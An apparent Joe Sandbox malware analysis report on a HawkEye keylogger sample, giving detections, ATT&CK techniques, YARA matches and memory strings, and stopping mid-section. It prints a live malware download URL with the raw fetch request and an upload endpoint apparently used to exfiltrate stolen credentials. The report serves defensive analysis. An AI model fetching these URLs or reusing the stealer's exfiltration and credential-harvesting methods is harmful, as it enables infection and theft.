Analysis Report http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 208783
Start date: 17.02.2020
Start time: 13:25:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: urldownload.jbs
Sample URL: http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.win@14/8@1/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 39% (good quality ratio 33.8%)
  • Quality average: 71.5%
  • Quality standard deviation: 35.2%
HCA Information:
  • Successful, ratio: 94%
  • Number of executed functions: 218
  • Number of non-executed functions: 298
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Excluded processes from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Excluded IPs from analysis (whitelisted): 40.90.23.153, 40.90.137.120, 40.90.23.247, 51.105.249.239
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, lgin.msa.trafficmanager.net, am3p.wns.notify.windows.com.akadns.net, login.live.com, emea1.notify.windows.com.akadns.net, wns.notify.windows.com.akadns.net, login.msa.msidentity.com
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | false | HawkEye | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false


Classification

Analysis Advice

Initial sample is implementing a service and should be registered / started as service



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation121 | Scheduled Task1 | Process Injection212 | Software Packing13 | Credential Dumping1 | System Time Discovery1 | Remote File Copy1 | Data from Local System1 | Data Encrypted11 | Remote File Copy1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | Execution through API11 | Application Shimming1 | Scheduled Task1 | Disabling Security Tools1 | Credentials in Files1 | Account Discovery1 | Remote Services | Email Collection1 | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Execution through Module Load1 | Accessibility Features | Application Shimming1 | Deobfuscate/Decode Files or Information11 | Input Capture1 | Security Software Discovery34 | Windows Remote Management | Input Capture1 | Automated Exfiltration | Remote Access Tools1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Graphical User Interface1 | System Firmware | DLL Search Order Hijacking | Obfuscated Files or Information3 | Credentials in Registry2 | File and Directory Discovery2 | Logon Scripts | Clipboard Data1 | Data Encrypted | Standard Non-Application Layer Protocol2 | SIM Card Swap | Premium SMS Toll Fraud
Exploit Public-Facing Application | Command-Line Interface1 | Shortcut Modification | File System Permissions Weakness | Masquerading1 | Account Manipulation | System Information Discovery19 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Application Layer Protocol2 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Spearphishing Link | Scheduled Task1 | Modify Existing Service | New Service | Virtualization/Sandbox Evasion13 | Brute Force | Virtualization/Sandbox Evasion13 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | Abuse Accessibility Features
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Process Injection212 | Two-Factor Authentication Interception | Process Discovery4 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Indicator Blocking | Bash History | System Owner/User Discovery1 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection | Input Prompt | Remote System Discovery1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | Data Destruction

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://a.pomf.cat/ | URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Avira: detection malicious, Label: TR/Kryptik.kjuys
Source: C:\Users\user\AppData\Roaming\TPykFAdhwNOvb.exe | Avira: detection malicious, Label: TR/Kryptik.kjuys
Found malware configuration
Source: vbc.exe.4780.8.memstr | Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
Multi AV Scanner detection for domain / URL
Source: robotrade.com.vn | Virustotal: Detection: 12%
Source: http://pomf.cat/upload.php | Virustotal: Detection: 8%
Source: http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe | Virustotal: Detection: 18%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\TPykFAdhwNOvb.exe | Virustotal: Detection: 38%
Source: C:\Users\user\AppData\Roaming\TPykFAdhwNOvb.exe | ReversingLabs TitaniumCloud: Detection: 41%
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Virustotal: Detection: 38%
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | ReversingLabs TitaniumCloud: Detection: 41%
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\TPykFAdhwNOvb.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack | Avira: Label: TR/Kryptik.kjuys
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack | Avira: Label: TR/Kryptik.kjuys
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack | Avira: Label: TR/Kryptik.kjuys
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack | Avira: Label: TR/Kryptik.kjuys

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0040A1A7 FindFirstFileW,FindNextFileW | 8_2_0040A1A7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 12_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen | 12_2_0040702D

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.5:49788 -> 103.74.123.3:80
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
GET /wp-content/images/views/qaxCr0UKyI0yfkE.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Accept: */*
Accept-Encoding: identity
Host: robotrade.com.vn
Connection: Keep-Alive
Found strings which match known social media URLs
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exe, 00000008.00000002.1978302785.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exe, 00000008.00000002.1978302785.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 00000008.00000003.1978002173.0000000000A09000.00000004.00000001.sdmp | String found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/en-us/welcomeie11/http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: vbc.exe, 00000008.00000003.1978002173.0000000000A09000.00000004.00000001.sdmp | String found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/en-us/welcomeie11/http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: robotrade.com.vn
URLs found in memory or binary data
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | String found in binary or memory: http://bot.whatismyipaddress.com/
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | String found in binary or memory: http://pomf.cat/upload.php
Source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, qaxCr0UKyI0yfkE.exe, 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | String found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
Source: wget.exe, 00000002.00000002.1954242091.0000000000B00000.00000004.00000020.sdmp, cmdline.out.2.dr | String found in binary or memory: http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe
Source: wget.exe, 00000002.00000002.1954404415.0000000001360000.00000004.00000040.sdmp | String found in binary or memory: http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exelit
Source: wget.exe, 00000002.00000002.1954404415.0000000001360000.00000004.00000040.sdmp | String found in binary or memory: http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exer0UK
Source: qaxCr0UKyI0yfkE.exe | String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: wget.exe, 00000002.00000002.1954404415.0000000001360000.00000004.00000040.sdmp, qaxCr0UKyI0yfkE.exe, 00000004.00000002.1971366862.0000000000F6C000.00000004.00000020.sdmp, qaxCr0UKyI0yfkE.exe.2.dr | String found in binary or memory: http://tempuri.org/DataSet1.xsdMMonoGame.UI.Forms.Properties.Resources
Source: vbc.exe, 00000008.00000002.1978232779.0000000000192000.00000004.00000010.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: vbc.exe, vbc.exe, 0000000C.00000002.2185769196.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | String found in binary or memory: https://a.pomf.cat/
Source: vbc.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: vbc.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger
Source: Yara match | File source: 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORY
Source: Yara match | File source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORY
Source: Yara match | File source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPE
Contains functionality to read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0040FDCB OpenClipboard,GetLastError,DeleteFileW | 8_2_0040FDCB
Creates a DirectInput object (often for capturing keystrokes)
Source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1971316846.0000000000F38000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
Source: 0000000C.00000002.2185769196.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
Source: 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
Source: 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
Source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
Source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
Source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
Source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload | Author: ditekshen
Source: 12.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
Source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
Source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
Contains functionality to call native functions
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Code function: 7_2_0551AC9F NtUnmapViewOfSection,NtUnmapViewOfSection | 7_2_0551AC9F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification | 8_2_0040A5A9
Detected potential crypto function
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00445190 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00416849 appears 66 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0040924D appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00412084 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004166E8 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00416A91 appears 88 times
Yara signature matchShow sources
Source: 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.2185769196.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 12.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)Show sources
Source: qaxCr0UKyI0yfkE.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: TPykFAdhwNOvb.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.NET source code contains calls to encryption/decryption functionsShow sources
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u200d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u200d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u200d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u200c???????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
.NET source code contains many API calls related to securityShow sources
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u206f????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u206f????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u206f????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u206a????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u202d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u202d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Classification label
Source: classification engineClassification label: mal100.phis.troj.spyw.evad.win@14/8@1/1
Contains functionality for error logging
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004183B8 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,8_2_004183B8
Contains functionality to check free disk space
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00418842 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,8_2_00418842
Contains functionality to enumerate processes or threads
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00413C19 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,FindCloseChangeNotification,free,Process32NextW,FindCloseChangeNotification,8_2_00413C19
Contains functionality to load and extract PE file embedded resources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004149B0 FindResourceW,SizeofResource,LoadResource,LockResource,8_2_004149B0
Creates files inside the user directory (cmdline.out is written by the analysis harness's cmd.exe/wget download step, not by the sample)
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.out
Creates mutexes (the WilError_01 mutants belong to conhost.exe's own error handling, not to the sample)
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:888:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_01
Creates temporary files (tmpC925.tmp is the task definition later passed to schtasks.exe /XML)
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC925.tmp
Parts of this application use the .NET runtime (probably coded in C#)
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dll
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dll
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries a list of all open handles
